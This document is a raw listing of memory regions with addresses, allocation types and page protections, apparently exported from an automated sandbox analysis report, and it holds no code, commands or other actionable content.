71A0000
trusted library allocation
page read and write
7FFAAC490000
trusted library allocation
page read and write
338F000
stack
page read and write
6D978FF000
unkown
page read and write
7FFAAC400000
trusted library allocation
page read and write
1CB06661000
heap
page read and write
24B23000
heap
page read and write
228D8000
trusted library allocation
page read and write
256B0000
trusted library allocation
page read and write
262E3F70000
trusted library allocation
page read and write
24AB8000
heap
page read and write
7F50000
trusted library allocation
page execute and read and write
24A84000
heap
page read and write
2F90000
heap
page read and write
2255F000
stack
page read and write
262E451A000
heap
page read and write
1CB08721000
heap
page read and write
8470000
direct allocation
page read and write
1CB088D8000
heap
page read and write
2B4D000
heap
page read and write
7FFAAC390000
trusted library allocation
page read and write
2A49000
trusted library allocation
page read and write
72FD000
stack
page read and write
6EC0F000
unkown
page readonly
262CC564000
trusted library allocation
page read and write
24F90000
trusted library allocation
page read and write
1CB08443000
heap
page read and write
262CA430000
heap
page read and write
8067E37000
stack
page read and write
1FF26CD0000
heap
page read and write
7FFAAC340000
trusted library allocation
page read and write
1CB0660B000
heap
page read and write
3190000
heap
page read and write
262CC425000
trusted library allocation
page read and write
24FD0000
trusted library allocation
page read and write
7FFAAC3D0000
trusted library allocation
page read and write
7EB0000
trusted library allocation
page read and write
262E4500000
heap
page execute and read and write
25000000
trusted library allocation
page read and write
24FE0000
trusted library allocation
page read and write
7FFAAC260000
trusted library allocation
page execute and read and write
24F70000
trusted library allocation
page read and write
24FA0000
trusted library allocation
page read and write
7067000
heap
page read and write
256B0000
trusted library allocation
page read and write
24F80000
trusted library allocation
page read and write
262DBF71000
trusted library allocation
page read and write
457E000
stack
page read and write
223EE000
stack
page read and write
4846000
trusted library allocation
page read and write
24F90000
trusted library allocation
page read and write
84C0000
trusted library allocation
page execute and read and write
7150000
trusted library allocation
page read and write
2566D000
stack
page read and write
7FFAAC3F0000
trusted library allocation
page read and write
1CB08721000
heap
page read and write
7F1D0000
trusted library allocation
page execute and read and write
24FD0000
trusted library allocation
page read and write
8067EB8000
stack
page read and write
7106000
heap
page read and write
1CB08418000
heap
page read and write
8540000
direct allocation
page read and write
463E000
stack
page read and write
262CC7B1000
trusted library allocation
page read and write
224D0000
trusted library allocation
page read and write
319C000
heap
page read and write
8460000
direct allocation
page read and write
1CB08458000
heap
page read and write
45BE000
stack
page read and write
7050000
direct allocation
page read and write
2B41000
heap
page read and write
262CA4FE000
heap
page read and write
24FA0000
trusted library allocation
page read and write
2A65000
trusted library allocation
page execute and read and write
2F17000
trusted library allocation
page execute and read and write
262E44D0000
heap
page execute and read and write
806803E000
stack
page read and write
8520000
direct allocation
page read and write
1CB065EF000
heap
page read and write
2259D000
stack
page read and write
24FD0000
trusted library allocation
page read and write
256B0000
trusted library allocation
page read and write
25020000
trusted library allocation
page read and write
809B000
stack
page read and write
7310000
trusted library allocation
page read and write
7EE50000
trusted library allocation
page execute and read and write
70F1000
heap
page read and write
262E45C6000
heap
page read and write
256B0000
trusted library allocation
page read and write
844E000
stack
page read and write
2272A000
stack
page read and write
24FD0000
trusted library allocation
page read and write
7FFAAC410000
trusted library allocation
page read and write
6D979FF000
stack
page read and write
24996000
trusted library allocation
page read and write
7FFAAC143000
trusted library allocation
page execute and read and write
256B0000
trusted library allocation
page read and write
7FFAAC420000
trusted library allocation
page read and write
2EF0000
trusted library allocation
page read and write
22740000
trusted library allocation
page read and write
24F80000
trusted library allocation
page read and write
1CB08721000
heap
page read and write
44F8000
heap
page read and write
262CA53C000
heap
page read and write
24FCE000
stack
page read and write
256B0000
trusted library allocation
page read and write
7E90000
trusted library allocation
page execute and read and write
1CB08721000
heap
page read and write
6F63000
heap
page read and write
2B1C000
heap
page read and write
2F1B000
trusted library allocation
page execute and read and write
6D975BD000
stack
page read and write
4E9D000
trusted library allocation
page read and write
1CB088D7000
heap
page read and write
24EEE000
stack
page read and write
7180000
trusted library allocation
page read and write
24F80000
trusted library allocation
page read and write
24F90000
trusted library allocation
page read and write
262CA6D5000
heap
page read and write
24F90000
trusted library allocation
page read and write
2BBA000
heap
page read and write
1CB08721000
heap
page read and write
25950000
trusted library allocation
page read and write
24F90000
trusted library allocation
page read and write
6F33000
heap
page read and write
1CB088D7000
heap
page read and write
1CB083E1000
heap
page read and write
262CBF40000
heap
page execute and read and write
8161000
heap
page read and write
1CB08435000
heap
page read and write
262CDD7A000
trusted library allocation
page read and write
24FB0000
trusted library allocation
page read and write
24F80000
trusted library allocation
page read and write
25010000
trusted library allocation
page read and write
6E5E000
stack
page read and write
24FD0000
trusted library allocation
page read and write
4E9B000
trusted library allocation
page read and write
24F90000
trusted library allocation
page read and write
1CB082E1000
heap
page read and write
73A0000
trusted library allocation
page read and write
24F90000
trusted library allocation
page read and write
7FFAAC3A0000
trusted library allocation
page read and write
262E4633000
heap
page read and write
7FFAAC330000
trusted library allocation
page execute and read and write
1CB08435000
heap
page read and write
1CB088D8000
heap
page read and write
22850000
heap
page read and write
1CB06808000
heap
page read and write
7E3D000
stack
page read and write
1CB08303000
heap
page read and write
226D0000
direct allocation
page read and write
80681BB000
stack
page read and write
262E47A2000
heap
page read and write
24F80000
trusted library allocation
page read and write
24F80000
trusted library allocation
page read and write
262DC262000
trusted library allocation
page read and write
256B0000
trusted library allocation
page read and write
22840000
trusted library allocation
page read and write
25940000
trusted library allocation
page read and write
225DD000
stack
page read and write
24FC0000
trusted library allocation
page read and write
6EA0000
direct allocation
page read and write
24F70000
trusted library allocation
page read and write
1CB088D7000
heap
page read and write
818A000
heap
page read and write
262E3FE6000
heap
page read and write
1CB08443000
heap
page read and write
2FE0000
heap
page read and write
2A3D000
trusted library allocation
page execute and read and write
8500000
direct allocation
page read and write
4EB3000
trusted library allocation
page read and write
1CB08721000
heap
page read and write
1CB08721000
heap
page read and write
1CB08721000
heap
page read and write
73B0000
trusted library allocation
page read and write
24FF0000
trusted library allocation
page read and write
262CC84D000
trusted library allocation
page read and write
24C20000
heap
page execute and read and write
2EFD000
trusted library allocation
page execute and read and write
7350000
trusted library allocation
page read and write
2A40000
trusted library allocation
page read and write
6E8E000
stack
page read and write
1CB08721000
heap
page read and write
262CA6D0000
heap
page read and write
2F15000
trusted library allocation
page execute and read and write
24FB0000
trusted library allocation
page read and write
2251E000
stack
page read and write
25020000
trusted library allocation
page read and write
24B28000
heap
page read and write
6F63000
heap
page read and write
24878000
trusted library allocation
page read and write
1CB08307000
heap
page read and write
7340000
trusted library allocation
page read and write
442C000
stack
page read and write
2A60000
trusted library allocation
page read and write
2267E000
stack
page read and write
2A10000
trusted library allocation
page read and write
262CC804000
trusted library allocation
page read and write
24FB0000
trusted library allocation
page read and write
1CB08308000
heap
page read and write
25010000
trusted library allocation
page read and write
24FC000
stack
page read and write
7DF408EC0000
trusted library allocation
page execute and read and write
6EBF1000
unkown
page execute read
262E456A000
heap
page read and write
2F0A000
trusted library allocation
page execute and read and write
835E000
stack
page read and write
256C0000
trusted library allocation
page read and write
7FFAAC430000
trusted library allocation
page read and write
1CB088D7000
heap
page read and write
24F80000
trusted library allocation
page read and write
6EF0000
heap
page read and write
706C000
heap
page read and write
24FB0000
trusted library allocation
page read and write
1CB088D8000
heap
page read and write
22850000
trusted library allocation
page read and write
24F91000
trusted library allocation
page read and write
1CB088D8000
heap
page read and write
2A20000
heap
page read and write
25010000
trusted library allocation
page read and write
A0C9000
direct allocation
page execute and read and write
884E000
stack
page read and write
24F80000
trusted library allocation
page read and write
2A30000
trusted library allocation
page read and write
7360000
trusted library allocation
page read and write
1FF26AB0000
heap
page read and write
24A90000
heap
page read and write
262CDDED000
trusted library allocation
page read and write
2538000
stack
page read and write
7FFAAC4B0000
trusted library allocation
page read and write
6BED000
stack
page read and write
24FD0000
trusted library allocation
page read and write
7ED0000
heap
page read and write
1CB065DB000
heap
page read and write
24F90000
trusted library allocation
page read and write
253D000
stack
page read and write
24FD0000
trusted library allocation
page read and write
24C30000
heap
page read and write
24F2E000
stack
page read and write
2A5A000
trusted library allocation
page execute and read and write
25000000
trusted library allocation
page read and write
8068B8E000
stack
page read and write
1CB085C7000
heap
page read and write
1CB0842F000
heap
page read and write
6E45000
heap
page read and write
29F0000
trusted library section
page read and write
2B0E000
stack
page read and write
8067753000
stack
page read and write
7FFAAC226000
trusted library allocation
page execute and read and write
7FFAAC14D000
trusted library allocation
page execute and read and write
7FFB22712000
unkown
page readonly
4660000
heap
page execute and read and write
6FBE000
heap
page read and write
262CDCF4000
trusted library allocation
page read and write
256B0000
trusted library allocation
page read and write
24F83000
trusted library allocation
page read and write
7330000
trusted library allocation
page read and write
7300000
trusted library allocation
page read and write
262E4514000
heap
page read and write
2EE0000
trusted library allocation
page read and write
7FFB22706000
unkown
page readonly
24990000
trusted library allocation
page read and write
1CB0665F000
heap
page read and write
24F80000
trusted library allocation
page read and write
8120000
heap
page read and write
1CB06632000
heap
page read and write
262CBF67000
heap
page read and write
24F80000
trusted library allocation
page read and write
806813E000
stack
page read and write
2A62000
trusted library allocation
page read and write
7D97000
stack
page read and write
24F90000
trusted library allocation
page read and write
7320000
trusted library allocation
page read and write
262CD258000
trusted library allocation
page read and write
1CB06808000
heap
page read and write
6F66000
heap
page read and write
262CBE90000
heap
page readonly
24F90000
trusted library allocation
page read and write
723E000
stack
page read and write
6F63000
heap
page read and write
1FF26B00000
heap
page read and write
25010000
trusted library allocation
page read and write
8067A7F000
stack
page read and write
256B0000
trusted library allocation
page read and write
24B46000
heap
page read and write
2BA0000
heap
page read and write
24FA0000
trusted library allocation
page read and write
24FD0000
trusted library allocation
page read and write
24FBE000
trusted library allocation
page read and write
24F70000
trusted library allocation
page read and write
24FC0000
trusted library allocation
page read and write
24FD0000
trusted library allocation
page read and write
22760000
heap
page read and write
6EBF0000
unkown
page readonly
24F80000
trusted library allocation
page read and write
24C31000
heap
page read and write
7FFAAC142000
trusted library allocation
page read and write
1CB0842F000
heap
page read and write
24F70000
trusted library allocation
page read and write
2A2A000
heap
page read and write
24F90000
trusted library allocation
page read and write
2246D000
stack
page read and write
249B1000
trusted library allocation
page read and write
256B0000
trusted library allocation
page read and write
256B0000
trusted library allocation
page read and write
7190000
trusted library allocation
page read and write
262DC253000
trusted library allocation
page read and write
6C2A000
stack
page read and write
6F8E000
heap
page read and write
2980000
heap
page read and write
24F80000
trusted library allocation
page read and write
25960000
trusted library allocation
page execute and read and write
2EE3000
trusted library allocation
page execute and read and write
1CB088D7000
heap
page read and write
262CA4B0000
heap
page read and write
24FE0000
trusted library allocation
page read and write
1CB082FC000
heap
page read and write
24AF6000
heap
page read and write
24BFB000
stack
page read and write
6BAA000
stack
page read and write
24994000
trusted library allocation
page read and write
84B0000
direct allocation
page read and write
6FB3000
heap
page read and write
8067C7E000
stack
page read and write
24F80000
trusted library allocation
page read and write
2F12000
trusted library allocation
page read and write
24F80000
trusted library allocation
page read and write
63A9000
remote allocation
page execute and read and write
8B80000
direct allocation
page execute and read and write
25010000
trusted library allocation
page read and write
1CB08443000
heap
page read and write
262CBF65000
heap
page read and write
24FD0000
trusted library allocation
page execute and read and write
6F51000
heap
page read and write
840E000
stack
page read and write
7FFB226F0000
unkown
page readonly
453E000
stack
page read and write
256B0000
trusted library allocation
page read and write
84E0000
direct allocation
page read and write
7FFB226F1000
unkown
page execute read
262DBF80000
trusted library allocation
page read and write
24F80000
trusted library allocation
page read and write
262CC720000
trusted library allocation
page read and write
702E000
stack
page read and write
7FFAAC370000
trusted library allocation
page read and write
24FE0000
trusted library allocation
page read and write
24F90000
trusted library allocation
page read and write
1CB08721000
heap
page read and write
6FAE000
heap
page read and write
7FFAAC450000
trusted library allocation
page read and write
1CB08721000
heap
page read and write
8068D0B000
stack
page read and write
6F8E000
heap
page read and write
7380000
trusted library allocation
page read and write
25010000
trusted library allocation
page read and write
25940000
trusted library allocation
page read and write
7160000
trusted library allocation
page execute and read and write
1CB08721000
heap
page read and write
24F80000
trusted library allocation
page read and write
4480000
trusted library allocation
page read and write
21F80000
direct allocation
page read and write
71E0000
trusted library allocation
page read and write
7FFAAC1F0000
trusted library allocation
page read and write
262E4507000
heap
page execute and read and write
24F90000
trusted library allocation
page read and write
3080000
heap
page read and write
83A0000
trusted library allocation
page read and write
1CB082F0000
heap
page read and write
24F90000
trusted library allocation
page read and write
262CDD91000
trusted library allocation
page read and write
8068C8B000
stack
page read and write
256B0000
trusted library allocation
page read and write
6E9E000
stack
page read and write
257EE000
stack
page read and write
262CDD6B000
trusted library allocation
page read and write
262CC3DE000
trusted library allocation
page read and write
2AA8000
trusted library allocation
page read and write
2A33000
trusted library allocation
page execute and read and write
8490000
direct allocation
page read and write
2F06000
trusted library allocation
page execute and read and write
80677DE000
stack
page read and write
8530000
direct allocation
page read and write
24F80000
trusted library allocation
page read and write
249BD000
trusted library allocation
page read and write
2EFD000
stack
page read and write
24F80000
trusted library allocation
page read and write
24F70000
trusted library allocation
page read and write
7030000
heap
page read and write
24F80000
trusted library allocation
page read and write
223AF000
stack
page read and write
2F10000
trusted library allocation
page read and write
227F0000
heap
page read and write
22850000
trusted library allocation
page read and write
815D000
heap
page read and write
6E40000
heap
page read and write
1CB088D7000
heap
page read and write
7FFAAC4A0000
trusted library allocation
page read and write
7F60000
trusted library allocation
page read and write
262E4610000
heap
page read and write
7FFAAC2E0000
trusted library allocation
page read and write
1CB08308000
heap
page read and write
25B0000
heap
page read and write
1FF26CC5000
heap
page read and write
22850000
trusted library allocation
page read and write
21F70000
direct allocation
page read and write
2592E000
stack
page read and write
2236E000
stack
page read and write
249B6000
trusted library allocation
page read and write
1CB088D7000
heap
page read and write
6FB0000
heap
page read and write
43EF000
stack
page read and write
2BF0000
heap
page read and write
1CB088D7000
heap
page read and write
227EE000
stack
page read and write
1CB08308000
heap
page read and write
8140000
heap
page read and write
5719000
trusted library allocation
page read and write
262CC41C000
trusted library allocation
page read and write
294E000
stack
page read and write
1FF26B0B000
heap
page read and write
7EA0000
trusted library allocation
page read and write
262CBEA0000
trusted library allocation
page read and write
7FFAAC150000
trusted library allocation
page read and write
262CA460000
heap
page read and write
8067CFE000
stack
page read and write
2498E000
stack
page read and write
24FE0000
trusted library allocation
page read and write
44DE000
stack
page read and write
24F70000
trusted library allocation
page read and write
1CB084F0000
remote allocation
page read and write
8067F3B000
stack
page read and write
1CB088D7000
heap
page read and write
24F90000
trusted library allocation
page read and write
1CB0680A000
heap
page read and write
24F80000
trusted library allocation
page read and write
6EC0F000
unkown
page readonly
2A90000
heap
page readonly
24F70000
trusted library allocation
page read and write
1CB088D7000
heap
page read and write
24F90000
trusted library allocation
page read and write
24F80000
trusted library allocation
page read and write
24F92000
trusted library allocation
page read and write
4665000
heap
page execute and read and write
1CB0856A000
heap
page read and write
24F90000
trusted library allocation
page read and write
24F90000
trusted library allocation
page read and write
1CB088D7000
heap
page read and write
24F70000
trusted library allocation
page read and write
6CAD000
stack
page read and write
262CBF71000
trusted library allocation
page read and write
8067EBE000
stack
page read and write
21F90000
direct allocation
page read and write
4470000
trusted library allocation
page execute and read and write
25010000
trusted library allocation
page read and write
7FFAAC3C0000
trusted library allocation
page read and write
6CC0000
heap
page read and write
262CBFF5000
trusted library allocation
page read and write
256B0000
trusted library allocation
page read and write
23899000
trusted library allocation
page read and write
7F45000
trusted library allocation
page read and write
1CB084F0000
remote allocation
page read and write
1CB08721000
heap
page read and write
1CB08721000
heap
page read and write
24A60000
trusted library allocation
page read and write
5993000
trusted library allocation
page read and write
1CB088D7000
heap
page read and write
6E90000
heap
page readonly
24AF6000
heap
page read and write
24B43000
heap
page read and write
7FFAAC470000
trusted library allocation
page read and write
1CB088D7000
heap
page read and write
8067D79000
stack
page read and write
262E45D9000
heap
page read and write
7060000
heap
page read and write
7DA0000
heap
page read and write
24F83000
trusted library allocation
page read and write
24A0C000
stack
page read and write
24F90000
trusted library allocation
page read and write
7138000
trusted library allocation
page read and write
1CB08721000
heap
page read and write
24B3C000
heap
page read and write
1CB08473000
heap
page read and write
73C0000
trusted library allocation
page read and write
262CC45E000
trusted library allocation
page read and write
1CB082E7000
heap
page read and write
24FD0000
trusted library allocation
page read and write
1CB088D7000
heap
page read and write
7FFAAC1F6000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
1CB0853D000
heap
page read and write
24F6E000
stack
page read and write
24F81000
trusted library allocation
page read and write
7FFAAC460000
trusted library allocation
page read and write
1CB0842F000
heap
page read and write
262E4568000
heap
page read and write
1CB08308000
heap
page read and write
2A00000
trusted library section
page read and write
2AC0000
heap
page read and write
262CC196000
trusted library allocation
page read and write
1CB08721000
heap
page read and write
227A8000
stack
page read and write
1CB08721000
heap
page read and write
7E7F000
stack
page read and write
4460000
remote allocation
page execute and read and write
5701000
trusted library allocation
page read and write
24FE0000
trusted library allocation
page read and write
2BEE000
unkown
page read and write
24F90000
trusted library allocation
page read and write
29CF000
stack
page read and write
1CB084F0000
remote allocation
page read and write
262CA514000
heap
page read and write
24F90000
trusted library allocation
page read and write
8068C0D000
stack
page read and write
24F90000
trusted library allocation
page read and write
262E4510000
heap
page read and write
6F6A000
heap
page read and write
262CA59F000
heap
page read and write
262CC430000
trusted library allocation
page read and write
6EC06000
unkown
page readonly
71ED000
trusted library allocation
page read and write
262CDD76000
trusted library allocation
page read and write
6F66000
heap
page read and write
25930000
trusted library allocation
page read and write
1CB082F3000
heap
page read and write
1CB082EC000
heap
page read and write
8510000
direct allocation
page read and write
6FC1000
heap
page read and write
7FFB22715000
unkown
page readonly
AAC9000
direct allocation
page execute and read and write
2494C000
stack
page read and write
811C000
stack
page read and write
24F70000
trusted library allocation
page read and write
4752000
trusted library allocation
page read and write
2ED0000
trusted library allocation
page read and write
24F90000
trusted library allocation
page read and write
1CB088D7000
heap
page read and write
24A80000
heap
page read and write
2499B000
trusted library allocation
page read and write
24F80000
trusted library allocation
page read and write
256B0000
trusted library allocation
page read and write
1CB08408000
heap
page read and write
6FC1000
heap
page read and write
24F80000
trusted library allocation
page read and write
24EAD000
stack
page read and write
7FFAAC440000
trusted library allocation
page read and write
262CC49B000
trusted library allocation
page read and write
6F5E000
heap
page read and write
1FF26A90000
heap
page read and write
2582E000
stack
page read and write
262CD2A8000
trusted library allocation
page read and write
7F70000
trusted library allocation
page read and write
24FD0000
trusted library allocation
page read and write
25020000
trusted library allocation
page read and write
1CB08308000
heap
page read and write
56F1000
trusted library allocation
page read and write
22640000
remote allocation
page read and write
24FA0000
trusted library allocation
page read and write
70FA000
heap
page read and write
262E4710000
heap
page read and write
24F90000
trusted library allocation
page read and write
2F00000
trusted library allocation
page read and write
1CB08721000
heap
page read and write
1CB08721000
heap
page read and write
262E49B0000
heap
page read and write
24F80000
trusted library allocation
page read and write
21F60000
direct allocation
page read and write
262E4630000
heap
page read and write
1CB08721000
heap
page read and write
80DD000
stack
page read and write
1CB08721000
heap
page read and write
25010000
trusted library allocation
page read and write
8480000
direct allocation
page read and write
1CB084A1000
heap
page read and write
24F80000
trusted library allocation
page read and write
24F80000
trusted library allocation
page read and write
7FFAAC144000
trusted library allocation
page read and write
1CB088D8000
heap
page read and write
256C0000
trusted library allocation
page read and write
7FFAAC310000
trusted library allocation
page execute and read and write
226BF000
stack
page read and write
24F90000
trusted library allocation
page read and write
6B6D000
stack
page read and write
262CC814000
trusted library allocation
page read and write
24FA0000
trusted library allocation
page read and write
727E000
stack
page read and write
7DC0000
trusted library allocation
page read and write
262CA4FC000
heap
page read and write
25007000
trusted library allocation
page read and write
262CD830000
trusted library allocation
page read and write
228E4000
trusted library allocation
page read and write
24FA0000
trusted library allocation
page read and write
8067AFE000
stack
page read and write
7FFAAC322000
trusted library allocation
page read and write
262CC83A000
trusted library allocation
page read and write
24F70000
trusted library allocation
page read and write
6CB0000
heap
page read and write
7030000
direct allocation
page read and write
24F70000
trusted library allocation
page read and write
262E3FA0000
trusted library allocation
page read and write
7FFAAC350000
trusted library allocation
page read and write
24F90000
trusted library allocation
page read and write
2B10000
heap
page read and write
24FC0000
trusted library allocation
page read and write
24F90000
trusted library allocation
page read and write
740C000
stack
page read and write
24A60000
trusted library allocation
page read and write
262CDE00000
trusted library allocation
page read and write
6EC0D000
unkown
page read and write
24F80000
trusted library allocation
page read and write
24F90000
trusted library allocation
page read and write
262E4748000
heap
page read and write
2F20000
trusted library allocation
page execute and read and write
29D0000
heap
page read and write
24FD0000
trusted library allocation
page read and write
2950000
heap
page read and write
1CB08721000
heap
page read and write
2A50000
trusted library allocation
page read and write
1CB08435000
heap
page read and write
7FFAAC140000
trusted library allocation
page read and write
24FD0000
trusted library allocation
page read and write
8067BFE000
stack
page read and write
6EF8000
heap
page read and write
262CC438000
trusted library allocation
page read and write
262CA680000
heap
page read and write
1CB08721000
heap
page read and write
262CDF14000
trusted library allocation
page read and write
1CB08721000
heap
page read and write
262CDD53000
trusted library allocation
page read and write
24F80000
trusted library allocation
page read and write
226E0000
direct allocation
page read and write
1CB088D7000
heap
page read and write
2F02000
trusted library allocation
page read and write
24FD0000
trusted library allocation
page read and write
84F0000
direct allocation
page read and write
8CC9000
direct allocation
page execute and read and write
22640000
remote allocation
page read and write
84D0000
direct allocation
page read and write
There are 835 hidden memdumps, click here to show them.